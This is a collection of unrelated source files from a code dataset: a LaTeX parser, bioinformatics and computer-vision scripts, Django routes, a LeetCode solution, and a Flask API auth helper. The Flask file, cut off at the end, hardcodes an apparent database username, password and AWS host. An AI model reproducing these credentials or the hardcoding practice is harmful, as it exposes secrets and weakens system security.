+{"seq_id":"577200607","text":"import re\nfrom collections import namedtuple\n\n\nclass TexBookParser(object):\n    \"\"\"Parses components of a LaTeX book document into various objects for Python to utilise.\"\"\"\n\n    PreambleCapture = namedtuple(\"PreambleCapture\", \"key pattern\")\n\n    def __init__(self, nodes, preamble_captures=None):\n        \"\"\"Initialise the new instance of our class.\"\"\"\n        self.nodes = nodes\n\n        if preamble_captures is None:\n            preamble_captures = [\n                # PreambleCapture(\"module_code\", r'\\\\modulecode\\{(\\w+)\\}'),\n                # PreambleCapture(\"academic_year\", r'\\\\academicyear\\{(\\w+)\\}'),\n                # PreambleCapture(\"module_title\", r'\\\\moduletitle\\{(\\w+)\\}'),\n                self.PreambleCapture(key=\"book_number\", pattern=re.compile(r\"\\\\booknumber\\{(.*)\\}\")),\n                self.PreambleCapture(key=\"book_title\", pattern=re.compile(r\"\\\\booktitle\\{(.*)\\}\")),\n                self.PreambleCapture(key=\"book_author\", pattern=re.compile(r\"\\\\bookauthor\\{(.*)\\}\")),\n                self.PreambleCapture(key=\"book_version\", pattern=re.compile(r\"\\\\bookversion\\{(.*)\\}\")),\n\n                # If this regex can also capture '\\def\\CAPTUREME{MeToo}', that'd be cool...\n                self.PreambleCapture(key=\"new_command\", pattern=re.compile(r\"\\\\newcommand\\{(.+)\\}\\{(.+)\\}\"))\n            ]\n        self.preamble_captures = preamble_captures\n\n    def parse(self, latex_text):\n        \"\"\"Convert the given LaTeX document text into a Python-friendly Book object.\"\"\"\n        # Remove comments.\n        latex_text = self.prepare_latex_text(latex_text)\n\n        # Read and parse the LaTeX body.\n        body = self.read_body(latex_text)\n\n        root_node = self.nodes.get_class(self.nodes.root_node_id)\n        root_node = root_node()\n        root_node.add_children(self.parse_latex(body))\n\n        # Read and parse the LaTeX preamble data.\n        preamble = self.read_preamble(latex_text)\n        preamble_data = self.parse_preamble(preamble)\n\n        # Attach the preamble data onto the book.\n        root_node.preamble_data = preamble_data\n\n        return root_node\n\n    def prepare_latex_text(self, latex_text):\n        \"\"\"\n        Prepare the LaTeX text so it may be parsed correctly.\n\n        This includes tasks such as:\n        - Removing embedded comments\n        \"\"\"\n        # Strip the leading and trailing whitespace characters.\n        latex_text = latex_text.strip()\n\n        # Go through the file, line by line, removing the comments.\n        pattern = re.compile(r\"\\%.*$\")\n        lines = latex_text.strip().split(\"\\n\")\n        for idx in range(len(lines)):\n            lines[idx] = re.sub(pattern, \"\", lines[idx])\n        latex_text = \"\\n\".join(lines)\n\n        # We'll implement this better later...\n        # fixes = [\n        #     [r'\\\\bit\\s+', r'\\\\begin{itemize} '],\n        #     [r'\\\\eit\\s+', r'\\\\end{itemize} '],\n        #     [r'\\\\ben\\s+', r'\\\\begin{enumerate} '],\n        #     [r'\\\\een\\s+', r'\\\\end{enumerate} '],\n        #     [r'\\\\it\\s+', r'\\\\item '],\n        #     [r' ', r' ']\n        # ]\n        # for fix in fixes:\n        #     latex_text = re.sub(fix[0], fix[1], latex_text)\n\n        return latex_text\n\n    def read_preamble(self, latex_text):\n        \"\"\"Return the preamble for the given LaTeX text.\"\"\"\n        pattern = re.compile(r\"(.*)\\\\begin\\{document\\}\", re.DOTALL)\n        match = re.search(pattern, latex_text)\n        preamble = match.group(1) if match else \"\"\n        return preamble\n\n    def read_body(self, latex_text):\n        \"\"\"Return the body for the given LaTeX text.\"\"\"\n        pattern = re.compile(r\"\\\\begin\\{document\\}(.*)\\\\end\\{document\\}\", re.DOTALL)\n        match = re.search(pattern, latex_text)\n        body = match.group(1) if match else \"\"\n        return body\n\n    def parse_preamble(self, preamble):\n        \"\"\"Parse the preamble text, collecting the defined data.\"\"\"\n        # Dictionary to contain preamble properties and their declared values.\n        preamble_data = {}\n\n        # Capture a bunch of stuff from the preamble.\n        for the_capture in self.preamble_captures:\n            key = the_capture.key\n            regex = the_capture.pattern\n            pattern_obj = re.compile(regex)\n            groups = re.findall(pattern_obj, preamble)\n            for values in groups:\n                if key in preamble_data:\n                    if not isinstance(preamble_data[key], list):\n                        preamble_data[key] = [preamble_data[key]]\n                    preamble_data[key].append(values)\n                else:\n                    preamble_data[key] = values\n\n        return preamble_data\n\n    def parse_latex(self, latex):\n        r\"\"\"Parse the body of a LaTeX document, returning an array of all the immediate children as Nodes.\n\n        Takes the contents of '\\\\begin{document} ... \\\\end{document}' and generates a tree object representation.\n        This method returns the immediate children of the document, with each node holding pointers to\n        their own children.\n\n        We leave all detection of the start/end of nodes to the nodes themselves; this allows us to extend\n        the parser without further complicating this method. It also opens the door to being able to parse\n        more complex LaTeX files as we can abandon the use of Regex, allowing us to correctly detect\n        commands - such as an italic plain-text within a level node's title argument.\n\n        The logic for this method is fairly simple:\n        We go through the inputted LaTeX, checking for matches with each node configured for use in the\n        parser. These positive matches are then sorted into ascending order of appearance.\n\n        Next, we begin to iterate over our captured matches. During each iteration, we work out the parent of\n        the current match. This is done using a while loop and a stack. Each time we pop out a level, we create\n        a new Text node and fill its content with all the plain-text between the current node and our last match.\n\n        We now check that the parent is allowed children. We also then check that the current match does not\n        occur prior to the start of the parent. We shall describe the reason for this later on...\n\n        We now create an instance of the node for the current match and, if applicable, we iterate through the\n        match's arguments, making sure that they're valid. If the current argument is valid, we make a recursive\n        call and parse the current argument's content string into this method - returning a Python object\n        representation. 
We make these objects children of a new Argument node, which itself is to be made a\n child of the current node.\n\n Similar to earlier in the stack, we create a new Text node and fill its content with everything\n since the last match, or since the end of the most recently popped stack node.\n\n We then perform a peak onto the stack. If the stack is empty, the newly created Text node is to be\n appended to the children list. Otherwise, if the stack is not empty, the newly created Text node is\n to be attached as a child to whatever node is currently at the top of the stack.\n\n We now repeat the above reasoning with the instance of the node for the current match and then push\n that node onto the stack.\n\n Once we've iterated over each match, we pop everything off the stack creating Text nodes for\n any remaining text. When the stack is empty, we create a Text node for all - if any - plain-text left\n unprocessed.\n \"\"\"\n children = []\n\n # Ignore latex if it's just whitespace\n if not latex.isspace():\n text_node_class = self.nodes.get_class(self.nodes.text_node_id)\n\n # Get every node class and the matches for it.\n NodeMatch = namedtuple(\"NodeMatch\", \"node match\")\n\n node_matches = []\n for node_id, node in self.nodes.node_classes.items():\n if node.checkable:\n matches = node.check_latex(latex, self.nodes)\n for match in matches:\n node_match = NodeMatch(node=node, match=match)\n node_matches.append(node_match)\n\n last_match_index = 0\n\n if len(node_matches) > 0:\n # Sort in the order of match appearance first.\n node_matches.sort(key=lambda x: x.match.outer_start_index)\n\n stack = []\n for node_match in node_matches:\n # If the stack is populated, keep popping off items until the current node ends within the\n # bounds of the node at the top of the stack.\n while len(stack) > 0 and node_match.match.inner_end_index > stack[-1].match.inner_end_index:\n remaining_text_start_idx = max(last_match_index, stack[-1].match.inner_start_index)\n remaining_text = latex[remaining_text_start_idx:stack[-1].match.inner_end_index]\n if text_node_class.validate_content(remaining_text):\n text_node = text_node_class(content=remaining_text)\n stack[-1].node.add_child(text_node)\n last_match_index = stack[-1].match.outer_end_index\n stack.pop()\n\n # Only process this match if the stack is empty OR that the parent is allowed children\n # and the node isn't before the parent (top of stack).\n if (len(stack) == 0 or (\n stack[-1].node.allowed_children and\n node_match.match.inner_start_index > stack[-1].match.inner_start_index)):\n\n # Create the node.\n current_node = node_match.node()\n\n # Check the node for arguments and their validity.\n # If valid arguments exists, create an Argument node and make a\n # recursive call to this function.\n for argument in node_match.match.arguments:\n if current_node.validate_arguments(argument):\n argument_children = self.parse_latex(argument)\n if len(argument_children) > 0:\n argument_node_class = self.nodes.get_class(self.nodes.argument_node_id)\n argument_node = argument_node_class()\n argument_node.add_children(argument_children)\n current_node.add_child(argument_node)\n\n # If we have jumped over some text, add it to a Text node. 
And make it a child.\n previous_text = latex[last_match_index:node_match.match.outer_start_index]\n if text_node_class.validate_content(previous_text):\n text_node = text_node_class(content=previous_text)\n if len(stack) > 0:\n stack[-1].node.add_child(text_node)\n else:\n children.append(text_node)\n\n # If the stack isn't empty, make 'current_node' a child of the node on the top of the stack.\n # If the stack is empty, append 'current_node' to the children's list.\n if len(stack) > 0:\n stack[-1].node.add_child(current_node)\n else:\n children.append(current_node)\n\n last_match_index = node_match.match.inner_start_index\n\n # Push the 'current_node' and node_match.match onto the stack.\n node_instance_match = NodeMatch(node=current_node, match=node_match.match)\n stack.append(node_instance_match)\n\n # Get any remaining after text.\n while len(stack) > 0:\n after_text_start_idx = max(last_match_index, stack[-1].match.inner_start_index)\n after_text = latex[after_text_start_idx:stack[-1].match.inner_end_index]\n if text_node_class.validate_content(after_text):\n text_node = text_node_class(content=after_text)\n stack[-1].node.add_child(text_node)\n\n last_match_index = stack[-1].match.outer_end_index + 1\n stack.pop()\n\n # Get any remaining text.\n final_text = latex[last_match_index:len(latex)]\n if text_node_class.validate_content(final_text):\n text_node = text_node_class(content=final_text)\n children.append(text_node)\n\n return children\n","sub_path":"achive/UI/CAMEL 2/src/latexbook/latexparser/texbookparser.py","file_name":"texbookparser.py","file_ext":"py","file_size_in_byte":12846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"458131326","text":"# -*- coding: utf-8 -*-\n# @Desc :\n# @license : Copyright(C), CBR\n# @Contact : shiliang@chinaratings.com.cn\n# @Site :\nimport webbrowser\nclass Movie():\n \"\"\"this class provide a way to store movie related information\"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"pystudy.twilio/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"269833535","text":"import argparse\nimport numpy as np\nimport pickle\n\nimport cv2\nfrom sklearn.datasets import fetch_openml\nfrom utils.dataset_loader import Dataset\n\nclass MNISTDataset(Dataset):\n def __init__(self, config):\n super().__init__(config)\n self._data_folder_path = config[\"path\"]\n\n self._load_dataset()\n\n\n def _load_dataset(self):\n\n mnist = fetch_openml(self._data_folder_path, version=1,)\n self._images = mnist.data.astype(np.float32)\n self._images /= 255 \n self._labels = mnist.target.astype(np.int32)\n \n self._train_images, self._test_images = np.split(self._images, [len(self._images)-self._test_data_num])\n self._train_labels, self._test_labels = np.split(self._labels, [len(self._labels)-self._test_data_num])\n\n self._train_images = self._train_images.reshape((len(self._train_images), self._image_height, self._image_width, self._image_channel)) # (N, height, width, channel)\n self._test_images = self._test_images.reshape((len(self._test_images), self._image_height, 
self._image_width, self._image_channel))\n\n        self._train_labels = np.eye(np.max(self._train_labels)+1)[self._train_labels]\n        self._test_labels = np.eye(np.max(self._test_labels)+1)[self._test_labels]","sub_path":"scripts/utils/mnist_dataset_loader.py","file_name":"mnist_dataset_loader.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"443502130","text":"from django.urls import path\nfrom . import views,calendar_views\nfrom agri.views import PlanListView\n\n\"\"\"List of the pages served at 192.168.98.195:90/\"\"\"\napp_name=\"agri\"\nurlpatterns = [\n    path('signup/', views.signup, name=\"signup\"),  # Account creation\n    path('login/', views.Login.as_view(), name='login'),  # Login\n    path('', views.Logout.as_view(), name='logout'),  # Logout\n    path('register', views.register, name='create_crops'),  # Crop item registration screen; moved to a dialog\n    path('update_crops/<int:pk>', views.UpdateCropsView.as_view(), name='update_crops'),\n    path('detail/<int:pk>',views.ReadView.as_view(), name='read_crops'),\n    path('top', PlanListView.as_view(), name=\"top\"),  # Top page\n    path('top2', views.top2, name=\"top2\"),  # Old top page; not used\n    path('top3', PlanListView.as_view(), name=\"top3\"),  # Test page; shows the \"Your field\" (あなたの畑) button\n    # path('top4', views.top4, name=\"top4\"),  # Google Calendar; not used\n    path('step/<int:pk>/', views.step_register, name=\"step\"),  # Production process registration screen; moved to a dialog\n    path('step_result/<int:pk>/', views.step_result, name=\"step_result\"),  # Production process results registration screen; moved to a dialog\n    # path('pest_register/<int:pk>/', views.pest_register, name=\"pest_register\"),\n    path('pest/<int:pk>/', views.pest_register, name=\"pest\"),  # Pesticide registration screen; moved to a dialog\n    path('pest_result/<int:pk>/', views.pest_result, name=\"pest_result\"),  # Pesticide results registration screen; moved to a dialog\n    path('ferti/<int:pk>/', views.ferti_register, name=\"ferti\"),  # Fertilizer registration screen; moved to a dialog\n    path('ferti_result/<int:pk>/', views.ferti_result, name=\"ferti_result\"),  # Fertilizer results registration screen; moved to a dialog\n\n    # calendar - a calendar written in Python; planned to be used as the reference for further development\n    path('month/', calendar_views.MonthCalendar.as_view(), name='month'),\n    path('month/<int:year>/<int:month>/', calendar_views.MonthCalendar.as_view(), name='month'),\n    path('week/', calendar_views.WeekCalendar.as_view(), name='week'),\n    path('week/<int:year>/<int:month>/<int:day>/', calendar_views.WeekCalendar.as_view(), name='week'),\n    path('week_with_schedule/', calendar_views.WeekWithScheduleCalendar.as_view(), name='week_with_schedule'),\n    path(\n        'week_with_schedule/<int:year>/<int:month>/<int:day>/',\n        calendar_views.WeekWithScheduleCalendar.as_view(),\n        name='week_with_schedule'\n    ),\n    path(\n        'month_with_schedule/',\n        calendar_views.MonthWithScheduleCalendar.as_view(), name='month_with_schedule'\n    ),\n    path(\n        'month_with_schedule/<int:year>/<int:month>/',\n        calendar_views.MonthWithScheduleCalendar.as_view(), name='month_with_schedule'\n    ),\n    path('mycalendar/', calendar_views.MyCalendar.as_view(), name='mycalendar'),\n    path(\n        'mycalendar/<int:year>/<int:month>/<int:day>/', calendar_views.MyCalendar.as_view(), name='mycalendar'\n    ),\n    path(\n        'month_with_forms/',\n        calendar_views.MonthWithFormsCalendar.as_view(), name='month_with_forms'\n    ),\n    path(\n        'month_with_forms/<int:year>/<int:month>/',\n        calendar_views.MonthWithFormsCalendar.as_view(), name='month_with_forms'\n    ),\n]","sub_path":"agri/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"298113811","text":"import os\nimport random\n\nfrom labels import labels, numeric_labels, get_small_label_name\n\n\nPATH = '~/localCode/caffe/train_data_caffe.txt'\n\nwith open(os.path.expanduser(PATH)) as f:\n    data = f.readlines()\n\nnew_data = []\n\nfor line in data:\n    name, short_label = line.split()\n    new_label = random.choice(labels[get_small_label_name(short_label)])\n    new_data.append('%s %s\\n' % (name, new_label))\n\nwith open(os.path.expanduser('~/localCode/caffe/new_train_data_caffe.txt'), 'w') as f:\n    for line in new_data:\n        f.write(line)\n\n","sub_path":"convert_labels_101toimgnet.py","file_name":"convert_labels_101toimgnet.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"252013745","text":"# Given a binary tree, return the sum of values of nodes with even-valued grandparent.  (A grandparent of a node is the parent of its parent, if it exists.)\r\n#\n# If there are no nodes with an even-valued grandparent, return 0.\r\n#\n#  \r\n# Example 1:\r\n#\n#\n#\n#\n# Input: root = [6,7,8,2,7,1,3,9,null,1,4,null,null,null,5]\r\n# Output: 18\r\n# Explanation: The red nodes are the nodes with even-value grandparent while the blue nodes are the even-value grandparents.\r\n#\n#\n#  \r\n# Constraints:\r\n#\n#\n# \tThe number of nodes in the tree is between 1 and 10^4.\r\n# \tThe value of nodes is between 1 and 100.\r\n#\n\nimport collections\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    # def __init__(self):\n    #     self.total = 0\n\n    def sumEvenGrandparent(self, root: TreeNode) -> int:\n        # My takeaway: I did not think of passing the grandparent's value down\n        # It got accepted (AC), but the approach is rather clumsy\n        # BFS\n        # if root.val % 2 == 0:\n        #     if root.left:\n        #         if root.left.left:\n        #             self.total += root.left.left.val\n        #         if root.left.right:\n        #             self.total += root.left.right.val\n        #     self.sumEvenGrandparent(root.left)\n        #     if root.right:\n        #         if root.right.left:\n        #             self.total += root.right.left.val\n        #         if root.right.right:\n        #             self.total += root.right.right.val\n        #     self.sumEvenGrandparent(root.right)\n        # else:\n        #     if root.left:\n        #         self.sumEvenGrandparent(root.left)\n        #     if root.right:\n        #         self.sumEvenGrandparent(root.right)\n        # return self.total \n\n        # DFS, following the official solution (best approach)\n        # total = 0\n        # def dfs(grandparent, parent, node):\n        #     if node is None:\n        #         return\n        #     if grandparent % 2 == 0:\n        #         nonlocal total\n        #         total += node.val\n        #     dfs(parent, node.val, node.left)\n        #     dfs(parent, node.val, node.right)\n        \n        # dfs(1, 1, root)\n        # return total\n\n        # BFS, following the official solution (similar to my idea)\n        q = collections.deque([root])\n        total = 0\n        while q:\n            root = q.popleft()\n            if root.val % 2 == 0:\n                if root.left:\n                    if root.left.left:\n                        total += root.left.left.val\n                    if root.left.right:\n                        total += root.left.right.val\n                if root.right:\n                    if root.right.left:\n                        total += root.right.left.val\n                    if root.right.right:\n                        total += root.right.right.val\n            if root.left:\n                q.append(root.left)\n            if root.right:\n                q.append(root.right)\n        \n        return total\n","sub_path":"solutions/1243-sum-of-nodes-with-even-valued-grandparent/sum-of-nodes-with-even-valued-grandparent.py","file_name":"sum-of-nodes-with-even-valued-grandparent.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"231133360","text":"import cv2\nimport sys\nimport time\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 3:\n        print(__doc__)\n        sys.exit(1)\n    \n    cv2.setUseOptimized(True)\n    cv2.setNumThreads(4)\n\n    image = cv2.imread(sys.argv[1])\n\n    new_height = 400\n    new_width = int(image.shape[1]*new_height/image.shape[0])\n    image = cv2.resize(image,(new_width, new_height))\n\n    ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()\n    ss.setBaseImage(image)\n\n    start_time = time.time()\n    if(sys.argv[2] == 'f'):\n        ss.switchToSelectiveSearchFast()\n        print(\"Model Fast\")\n    elif(sys.argv[2] == 'q'):\n        ss.switchToSelectiveSearchQuality()\n        print(\"Model Quality\")\n    else: \n        print(__doc__)\n        sys.exit(1)\n\n    rects = ss.process()\n    print(\"Total number of region proposals: \"+str(len(rects)))\n    number_show_region = 100\n    increment = 50\n\n    while True:\n        image_out = image.copy()\n\n        for i, rect in enumerate(rects):\n            if (i < number_show_region):\n                x, y, w, h = rect\n                # print(rect)\n                cv2.rectangle(image_out, (x, y), (x+w, y+h), (0, 255, 0), 1, cv2.LINE_AA)\n            else:\n                break\n\n        end_time = time.time()\n        cv2.imshow(\"output\",image_out)\n        print(\"Time process: \" + str(end_time - start_time))\n        k = cv2.waitKey(0) & 0xFF\n\n        if k == 109: # press 'm' (ASCII 109) to show more regions\n            number_show_region += increment\n        elif k == 108: # press 'l' (ASCII 108) to show fewer regions\n            number_show_region -= increment\n        elif k == 113: # press 'q' to quit\n            break\n    cv2.destroyAllWindows()","sub_path":"Learn-Tensorflow/r-cnn/selective_search.py","file_name":"selective_search.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"627996559","text":"#!/usr/bin/env python3\n# https://github.com/rnnh/bioinfo-notebook.git\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 12:08:41 2020\n\n@author: ronan\n\nThis script creates a single CSV feature count table from the featureCounts\noutput tables in the target directory.\n\nThis combined feature count table can be used for differential expression\nanalysis (e.g. using DESeq2 or edgeR in R).\n\"\"\"\n\n# Loading required libraries\nfrom time import gmtime, strftime\nimport pandas as pd\nimport argparse\nimport sys\nimport os\n\n# Parsing command line arguments\nparser = argparse.ArgumentParser(\n    description = \"Combines the featureCounts output tables in the target \\\n    directory.\")\n\n# -d PATH -o CUSTOM_FILENAME\nparser.add_argument(\"-d\", \"--directory\", dest = \"path\",\n                    help = \"path to target directory. 
\\\n Default: current directory\")\nparser.add_argument(\"-o\", \"--output\", dest =\"custom_filename\",\n help = \"output filename.\\\n Default: featCounts_{species}_{date}.csv\")\n\nargs = parser.parse_args()\n\n# Changing to the target directory\nif args.path is not None:\n path = args.path\nelse:\n path = os.getcwd()\nos.chdir(path)\n\n# Creating variables\nfixed_headers = [\"Geneid\", \"Chromosome\", \"Start\", \"End\", \"Strand\", \"Length\"]\ntarget_file_prefix = \"feature_counts_\"\ndate = strftime(\"%Y%m%d\", gmtime())\ncounts_table = pd.DataFrame()\noutput_filename = str()\ntarget_file_count = 0\nspecies_name = str()\nsrr = str()\n\n# Iterating through files in target directory, combining feature counts\n# into one DataFrame object (\"counts_table\")\nfor filename in os.listdir():\n if filename.startswith(target_file_prefix):\n target_file_count = target_file_count + 1\n filename_list = filename.split(\"_\")\n srr = filename_list[2]\n species_name = filename_list[3] + \"_\" + filename_list[4]\n featCounts_df = pd.read_csv(filename, sep = \"\\t\",\n lineterminator = '\\n', skiprows = 1,\n header = 0)\n featCounts_headers = fixed_headers.copy()\n featCounts_headers += [srr]\n featCounts_df.columns = featCounts_headers\n gene_ids = featCounts_df[\"Geneid\"]\n counts = featCounts_df[srr]\n # Add the gene IDs and counts to the counts_table DataFrame as columns\n # if it's empty; otherwise add the counts only\n if counts_table.empty:\n counts_table = pd.concat([gene_ids, counts], axis = 1,\n sort = False)\n else:\n counts_table = pd.concat([counts_table, counts], axis = 1,\n sort = False)\n del featCounts_headers\n\nif target_file_count == 0:\n # Exiting script if there are no target files in the target directory\n print(\"ERROR: There are no featureCount files in the target directory. 
\\n\")\n    parser.print_help(sys.stderr)\n    sys.exit(1)\nelse:\n    # Exporting counts_table DataFrame as a CSV file\n    if args.custom_filename is not None:\n        output_filename = args.custom_filename\n    else:\n        output_filename = \"featCounts_\" + species_name + \"_\" + date + \".csv\"\n    counts_table.to_csv(output_filename, index = False)\n","sub_path":"scripts/combining_featCount_tables.py","file_name":"combining_featCount_tables.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"449041764","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# load digit\nsrc = cv2.imread(\"image/digits_print.bmp\",cv2.IMREAD_GRAYSCALE)\ndigits = []\nfor i in range(10) :\n    root = \"image/digits/digit{}.bmp\"\n    digits.append(cv2.imread(root.format(i),cv2.IMREAD_GRAYSCALE))\n\n    if digits[i] is None :\n        print(\"Image load failed\")\n        sys.exit()\n\nif src is None :\n    print(\"Image load failed\")\n    sys.exit()\n\n\n_,src_bin = cv2.threshold(src, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\nsrc_contours,_ = cv2.findContours(src_bin, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\ndst = cv2.cvtColor(src,cv2.COLOR_GRAY2RGB)\nfor pts in src_contours :\n    if cv2.contourArea(pts) < 1000 : continue\n\n    x,y,w,h = cv2.boundingRect(pts)\n    \n    crap = src[y:y+h, x:x+w]\n\n    crap = cv2.resize(crap,(100,150))\n    res = []\n    for digit in digits :\n        res.append(cv2.matchTemplate(crap, digit, cv2.TM_CCOEFF_NORMED))\n\n    n = np.argmax(res)\n    cv2.putText(dst, str(n), (x,y-3), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255,0,0),2,cv2.LINE_AA)\n    cv2.rectangle(dst,(x,y,w,h),(255,0,0),1)\n\n\ncv2.imshow('src',src)\ncv2.imshow('dst',dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"07.영상분할과객체검출/3_2.digitrec.py","file_name":"3_2.digitrec.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"264813296","text":"from flask import request\nfrom flask_restful import Resource\nfrom functools import wraps\nimport json\nimport requests\nfrom requests.exceptions import Timeout\n\n\n__all__ = [\"SlaveHandler\"]\n\nSTATUS_CODES = {\n\t200: \"Ok\",\n\t201: \"Created\",\n\t202: \"Accepted\",\n\t203: \"Non-Authoritative Information\",\n\t204: \"No Content\",\n\t400: \"Bad Request\",\n\t401: \"Unauthorized\",\n\t403: \"Forbidden\",\n\t404: \"Not Found\",\n\t405: \"Method Not Allowed\",\n\t409: \"Conflict\",\n\t422: \"Unprocessable Entity\",\n\t500: \"Internal Server Error\",\n\t408: \"Request Timeout\",\n\t406: \"Not Acceptable\",\n\t410: \"Gone\",\n\t413: \"Request Entity Too Large\",\n\t414: \"Request URI Too Large\",\n\t417: \"Expectation Failed\",\n\t429: \"Too Many Requests\",\n\t503: \"Service Unavailable\"}\n\nURLS = {\n\t\"DEV\": {\n\t\t\"rates\": \"http://dev.clever-api-rates.local\",\n\t\t\"auth\": \"http://auth-api-qa.clever.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-dev.local\",\n\t\t\"logs\": \"http://mislogs-dev.local\"},\n\t\"QA\": {\n\t\t\"rates\": \"http://rates-api-qa.clever.palace-resorts.local\",\n\t\t\"auth\": \"http://auth-api-qa.clever.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-qa.local\",\n\t\t\"logs\": \"http://mislogs-qa.local\"},\n\t\"PRO\": {\n\t\t\"rates\": \"http://rates-api.clever.palace-resorts.local\",\n\t\t\"auth\": \"http://clever.auth-api.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-pro.local\",\n\t\t\"logs\": \"http://mislogs-pro.local\"}}\n\n\nclass SlaveHandler:\n\n\tdef __init__(self, 
app=None):\n\t\tself.__CONFIG = app.config\n\n\t@property\n\tdef environment(self):\n\t\treturn self.app_config(\"APP_ENV\")\n\n\t@property\n\tdef system_id(self):\n\t\treturn self.app_config(\"SYSTEM_ID\")\n\n\t# Decorator to validate Bearer Token in request.\n\tdef access_middleware(self, func):\n\t\t@wraps(func)\n\t\tdef wrapper(*args, **kwargs):\n\t\t\tif 'Authorization' not in request.headers:\n\t\t\t\treturn self.build_error_response(400, \"EMPTY TOKEN OR NOT RECEIVED\")\n\t\t\telse:\n\t\t\t\t# Request auth to validate token\n\t\t\t\ttry:\n\t\t\t\t\tresource = 'Flask%s' % request.endpoint\n\t\t\t\t\tmethod = request.method.lower()\n\t\t\t\t\turl = self.get_url('auth')\n\t\t\t\t\tsystem_id = self.system_id\n\t\t\t\t\tauth_url = \"%s/acl/acl/%s/%s/%s\" % (url, resource, method, system_id)\n\t\t\t\t\tresponse = self.request(url=auth_url)\n\t\t\t\t\tif response['allowed_access'] is False:\n\t\t\t\t\t\treturn self.build_error_response(403, response['message'])\n\t\t\t\texcept Exception as e:\n\t\t\t\t\treturn self.build_error_response(401, \"BAD TOKEN GET A NEW ONE\")\n\t\t\t\t# Execute resource function\n\t\t\t\ttry:\n\t\t\t\t\treturn func(*args, **kwargs)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\treturn self.build_error_response(500, \"Something went wrong!\")\n\t\treturn wrapper\n\n\tdef decode_base64(self):\n\t\tpass\n\n\tdef app_config(self, key):\n\t\t\"\"\" Returns Flask.config global variables \"\"\"\n\t\treturn self.__CONFIG.get(key, \"\")\n\n\tdef build_error_response(self, status=500, return_code=True):\n\t\tresponse = {\n\t\t\t\"success\": False,\n\t\t\t\"status\": status,\n\t\t\t\"message\": [STATUS_CODES.get(status, \"Error\")],\n\t\t\t\"data\": []\n\t\t}\n\t\tif return_code:\n\t\t\treturn response, status\n\t\treturn response\n\n\tdef request(\n\t\tself, url=\"\", method=\"get\", data={},\n\t\tcontent_type=\"application/json\", auth=True, timeout=15):\n\t\t\"\"\"Make HTTP GET/POST/PUT requests\"\"\"\n\n\t\ttry:\n\t\t\theaders = {}\n\t\t\tif not auth:\n\t\t\t\theaders = {\"Authorization\": request.headers[\"Authorization\"]}\n\t\t\tif content_type == \"application/json\":\n\t\t\t\tdata = json.dumps(data)\n\t\t\theaders[\"content-type\"] = content_type\n\t\t\tresponse = None\n\t\t\tif method == \"post\":\n\t\t\t\tresponse = requests.post(url, data=data, headers=headers)\n\t\t\telif method == \"put\":\n\t\t\t\tresponse = requests.put(url, data=data, headers=headers)\n\t\t\telse:\n\t\t\t\tresponse = requests.get(url, headers=headers)\n\t\t\tif content_type == \"application/json\":\n\t\t\t\tresponse = json.loads(response.text)\n\t\t\treturn response\n\t\texcept Timeout as e:\n\t\t\treturn self.build_error_response(408)\n\t\texcept Exception as e:\n\t\t\treturn self.build_error_response(500)\n\n\tdef get_url(self, module):\n\t\t\"\"\" Gets API urls \"\"\"\n\n\t\turl = URLS.get(self.environment, \"DEV\").get(module, \"\")\n\t\treturn url\n\n\tdef get_db_uri(self):\n\t\t\"\"\" Retrieves database secret from AWS \"\"\"\n\n\t\tdbapi = self.app_config(\"SQLALCHEMY_DBAPI\")\n\t\tdatabase = self.app_config(\"SQLALCHEMY_DATABASE\")\n\t\tparams = self.app_config(\"SQLALCHEMY_PARAMS\")\n\n\t\tif type(params) is dict:\n\t\t\tparams = \"?%s\" % \"\".join(\n\t\t\t\t[\"&%s=%s\" % (key, value) for (key, value) in params.items()])\n\n\t\tusername = \"clv-rates-adm\"\n\t\tpassword = \"fk+ZrP3)8TSeb\"\n\t\thost = \"mysqldev57-cluster.cluster-cdrfidjuoewu.us-east-1.rds.amazonaws.com\"\n\t\tdb_uri = \"{dbapi}://{username}:{password}@{host}/{database}{params}\".format(\n\t\t\tdbapi=dbapi, 
